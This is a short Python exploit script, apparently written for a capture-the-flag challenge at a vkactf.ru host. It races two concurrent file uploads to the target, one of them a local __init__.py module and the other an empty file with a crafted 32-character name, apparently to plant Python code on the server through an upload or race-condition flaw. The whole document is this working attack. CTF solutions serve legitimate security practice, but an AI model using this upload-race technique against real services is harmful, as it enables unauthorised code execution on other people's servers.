#!/usr/bin/env python3
from subprocess import check_call
import requests
import concurrent.futures

def post_file(url, filename, filedata):
    with requests.Session() as s:
        s.post(url, files={'file': (filename, filedata)})

url = 'http://protest.vkactf.ru/'


def main():

    init_py_data = open('__init__.py', 'rb').read()
    empty_data = b''

    with concurrent.futures.ThreadPoolExecutor() as executor:

        futures = [
            executor.submit(post_file, url, '__init__.py', init_py_data),
            executor.submit(post_file, url, 'a' * 31 + '!', empty_data)
        ]

        for future in concurrent.futures.as_completed(futures):
            try:
                future.result()
            except Exception as e:
                print(f'Ошибка: {e}')

if __name__ == '__main__':
    main()
